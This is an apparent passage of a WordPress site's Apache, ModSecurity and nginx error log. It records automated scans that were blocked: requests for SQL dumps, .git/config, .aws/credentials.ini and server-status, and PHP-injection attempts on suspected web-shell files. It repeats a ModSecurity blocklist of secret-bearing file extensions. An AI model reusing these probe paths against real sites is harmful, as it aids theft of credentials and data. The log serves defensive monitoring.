"2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/sql.sql"] [unique_id "ZO5gIKRcMO_AOUye90he6wAAABI"] [Tue Aug 29 16:16:16.730941 2023] [:error] [pid 3721:tid 140198025340672] [client 18.222.183.82:59164] [client 18.222.183.82] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/dbdump.sql"] [unique_id "ZO5gIKRcMO_AOUye90he7AAAAAc"] [Tue Aug 29 16:16:16.730977 2023] [:error] [pid 3721:tid 140197941413632] [client 18.222.183.82:59166] [client 18.222.183.82] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/db.sql"] [unique_id "ZO5gIKRcMO_AOUye90he7QAAABE"] [Tue Aug 29 16:16:16.760447 2023] [:error] [pid 3721:tid 140198152976128] [client 18.222.183.82:59168] [client 18.222.183.82] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/site.sql"] [unique_id "ZO5gIKRcMO_AOUye90he7gAAAAA"] [Tue Aug 29 16:16:16.761598 2023] [:error] [pid 3721:tid 140198050518784] [client 18.222.183.82:59170] [client 18.222.183.82] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/translate.sql"] [unique_id "ZO5gIKRcMO_AOUye90he7wAAAAQ"] [Tue Aug 29 16:16:16.768503 2023] [:error] [pid 7621:tid 140198000162560] [client 18.222.183.82:59172] [client 18.222.183.82] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/1.sql"] [unique_id "ZO5gIMp1z_7TE3T2nEPVswAAAQo"] [Tue Aug 29 16:16:16.776085 2023] [:error] [pid 3810:tid 140197924628224] [client 18.222.183.82:59174] [client 18.222.183.82] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/wp-content/uploads/dump.sql"] [unique_id "ZO5gIFoHyIjsmhNxVe_xywAAAJM"] [Tue Aug 29 16:16:16.776960 2023] [:error] [pid 3722:tid 140198008555264] [client 18.222.183.82:59176] [client 18.222.183.82] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/mysql.sql"] [unique_id "ZO5gIPbNjsSDOaoRYpR7yAAAAEk"] [Tue Aug 29 16:16:16.876253 2023] [:error] [pid 7621:tid 140198008555264] [client 18.222.183.82:59180] [client 18.222.183.82] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/dump.sql"] [unique_id "ZO5gIMp1z_7TE3T2nEPVtAAAAQk"] [Tue Aug 29 16:16:18.956101 2023] [:error] [pid 3810:tid 140197907842816] [client 18.222.183.82:59186] [client 18.222.183.82] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/wp-content/mysql.sql"] [unique_id "ZO5gIloHyIjsmhNxVe_xzwAAAJU"] [Tue Aug 29 16:16:18.983010 2023] [:error] [pid 3810:tid 140198042126080] [client 18.222.183.82:59188] [client 18.222.183.82] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/localhost.sql"] [unique_id "ZO5gIloHyIjsmhNxVe_x0AAAAIU"] [Tue Aug 29 19:13:34.531889 2023] [authz_core:error] [pid 7621:tid 140197949806336] [client 178.62.3.65:38644] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Tue Aug 29 19:19:30.451018 2023] [authz_core:error] [pid 3721:tid 140197933020928] [client 139.144.150.205:39494] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/29 19:19:37 [error] 3808#3808: *740514 access forbidden by rule, client: 139.144.150.205, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Aug 29 20:58:11.293570 2023] [authz_core:error] [pid 3721:tid 140198016947968] [client 74.207.237.114:53982] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/29 20:58:15 [error] 3808#3808: *754004 access forbidden by rule, client: 74.207.237.114, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Aug 30 13:35:06.375406 2023] [autoindex:error] [pid 32499:tid 140290123880192] [client 23.99.212.127:54688] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Aug 30 18:01:44.075021 2023] [:error] [pid 4731:tid 140290073523968] [client 149.7.102.111:33274] [client 149.7.102.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:sfilecontent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-22.php"] [unique_id "ZO_KWGD_w4lxmajbKpl_TAAAAQk"] [Wed Aug 30 18:02:21.886153 2023] [:error] [pid 32587:tid 140289956026112] [client 149.7.102.111:33342] [client 149.7.102.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:sfilecontent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-22.php"] [unique_id "ZO_KfV6_71BhQW9ah8c6mQAAANc"] [Wed Aug 30 18:02:50.577535 2023] [:error] [pid 4731:tid 140289981204224] [client 149.7.102.111:33392] [client 149.7.102.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:sfilecontent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-22.php"] [unique_id "ZO_KmmD_w4lxmajbKpl_UgAAARQ"] [Thu Aug 31 06:11:58.878023 2023] [authz_core:error] [pid 15977:tid 139810933020416] [client 144.126.198.24:51188] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/31 06:12:06 [error] 6060#6060: *1006826 access forbidden by rule, client: 144.126.198.24, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Aug 31 09:39:31.525233 2023] [authz_core:error] [pid 6066:tid 139810790344448] [client 172.105.37.32:51880] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/31 09:39:40 [error] 6060#6060: *1032111 access forbidden by rule, client: 172.105.37.32, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Aug 31 11:04:38.723550 2023] [authz_core:error] [pid 15977:tid 139810849093376] [client 161.35.176.95:34872] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/31 11:04:45 [error] 6059#6059: *1041832 access forbidden by rule, client: 161.35.176.95, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Aug 31 11:32:19.156594 2023] [authz_core:error] [pid 15977:tid 139810790344448] [client 139.59.182.142:38464] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/31 11:32:23 [error] 6060#6060: *1045007 access forbidden by rule, client: 139.59.182.142, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Aug 31 13:50:54.834952 2023] [autoindex:error] [pid 6066:tid 139810949805824] [client 91.134.248.253:56852] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Thu Aug 31 17:09:32.904908 2023] [autoindex:error] [pid 15977:tid 139810798737152] [client 23.99.209.63:56420] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/09/01 02:42:46 [error] 6060#6060: *1158024 access forbidden by rule, client: 179.43.169.210, server: investigacionperu.com, request: "GET /.hg/hgrc HTTP/1.1", host: "investigacionperu.com" [Fri Sep 01 06:35:45.570883 2023] [:error] [pid 10482:tid 140174155839232] [client 144.217.180.167:57936] [client 144.217.180.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:code. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-plugin-dependencies/vale.php"] [unique_id "ZPHMkSb6fQkySPGbGkyHGAAAAIA"], referer: www.google.com [Fri Sep 01 07:44:55.404763 2023] [:error] [pid 11382:tid 140173966796544] [client 158.69.23.79:39722] [client 158.69.23.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:code. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-plugin-dependencies/vale.php"] [unique_id "ZPHcx7p0F-X324UHLT3ZAgAAAQ4"], referer: www.google.com [Sat Sep 02 09:03:13.973369 2023] [autoindex:error] [pid 21243:tid 140065183295232] [client 51.15.17.105:59964] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 02 09:09:35.863106 2023] [autoindex:error] [pid 21243:tid 140065191687936] [client 23.99.212.127:32780] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Sep 02 10:05:59.784857 2023] [:error] [pid 21243:tid 140065242044160] [client 195.238.123.211:41126] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Sep 02 10:06:03.550641 2023] [:error] [pid 21243:tid 140065309185792] [client 195.238.123.211:41140] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Sep 02 13:11:42.089992 2023] [:error] [pid 21153:tid 140065200080640] [client 41.216.188.92:38964] PHP Fatal error: Uncaught Error: Call to undefined function load_textdomain() in /home/investig/public_html/wp-admin/includes/admin.php:16, referer: www.google.com [Sat Sep 02 13:11:42.090068 2023] [:error] [pid 21153:tid 140065200080640] [client 41.216.188.92:38964] Stack trace:, referer: www.google.com [Sat Sep 02 13:11:42.090079 2023] [:error] [pid 21153:tid 140065200080640] [client 41.216.188.92:38964] #0 {main}, referer: www.google.com [Sat Sep 02 13:11:42.090153 2023] [:error] [pid 21153:tid 140065200080640] [client 41.216.188.92:38964] thrown in /home/investig/public_html/wp-admin/includes/admin.php on line 16, referer: www.google.com [Sat Sep 02 21:12:03.342817 2023] [:error] [pid 21152:tid 140065300793088] [client 41.216.188.164:51112] PHP Fatal error: Uncaught Error: Call to undefined function load_textdomain() in /home/investig/public_html/wp-admin/includes/admin.php:16, referer: www.google.com [Sat Sep 02 21:12:03.342911 2023] [:error] [pid 21152:tid 140065300793088] [client 41.216.188.164:51112] Stack trace:, referer: www.google.com [Sat Sep 02 21:12:03.342922 2023] [:error] [pid 21152:tid 140065300793088] [client 41.216.188.164:51112] #0 {main}, referer: www.google.com [Sat Sep 02 21:12:03.342987 2023] [:error] [pid 21152:tid 140065300793088] [client 41.216.188.164:51112] thrown in /home/investig/public_html/wp-admin/includes/admin.php on line 16, referer: www.google.com 2023/09/03 02:18:45 [error] 21109#21109: *1536535 access forbidden by rule, client: 45.135.57.88, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "www.investigacionperu.com" [Sun Sep 03 03:23:20.836745 2023] [ssl:warn] [pid 17193:tid 140281000454016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 03 03:23:27.234094 2023] [ssl:warn] [pid 17198:tid 140281000454016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 03 03:23:31.826260 2023] [ssl:warn] [pid 17198:tid 140281000454016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 03 03:23:37.908979 2023] [ssl:warn] [pid 17198:tid 140281000454016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 03 03:23:42.256004 2023] [ssl:warn] [pid 17719:tid 139878036694912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 03 03:23:46.487807 2023] [ssl:warn] [pid 17722:tid 139878036694912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 03 03:23:50.697699 2023] [ssl:warn] [pid 17722:tid 139878036694912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 03 10:55:59.171471 2023] [authz_core:error] [pid 17898:tid 139877664376576] [client 164.90.222.93:46730] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/03 10:56:03 [error] 17930#17930: *1596338 access forbidden by rule, client: 164.90.222.93, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Sep 03 11:12:06.966021 2023] [authz_core:error] [pid 17937:tid 139877731518208] [client 147.182.168.210:48622] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/03 11:12:10 [error] 17931#17931: *1598151 access forbidden by rule, client: 147.182.168.210, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Sep 03 13:03:45.362035 2023] [authz_core:error] [pid 24555:tid 139877706340096] [client 144.126.202.105:37650] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/03 13:03:51 [error] 17931#17931: *1613511 access forbidden by rule, client: 144.126.202.105, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Sep 03 14:20:04.735464 2023] [:error] [pid 17996:tid 139877756696320] [client 179.43.169.210:45966] [client 179.43.169.210] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/.aws/credentials.ini"] [unique_id "ZPTcZL3MjXZaSV2VBEXdlQAAAYM"] [Mon Sep 04 03:44:24.627383 2023] [ssl:warn] [pid 25166:tid 139646324037504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 04 03:44:26.843499 2023] [ssl:warn] [pid 25168:tid 139646324037504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 04 03:44:28.143441 2023] [ssl:warn] [pid 25168:tid 139646324037504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 04 03:44:31.380626 2023] [ssl:warn] [pid 25168:tid 139646324037504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 04 03:44:36.678023 2023] [ssl:warn] [pid 25685:tid 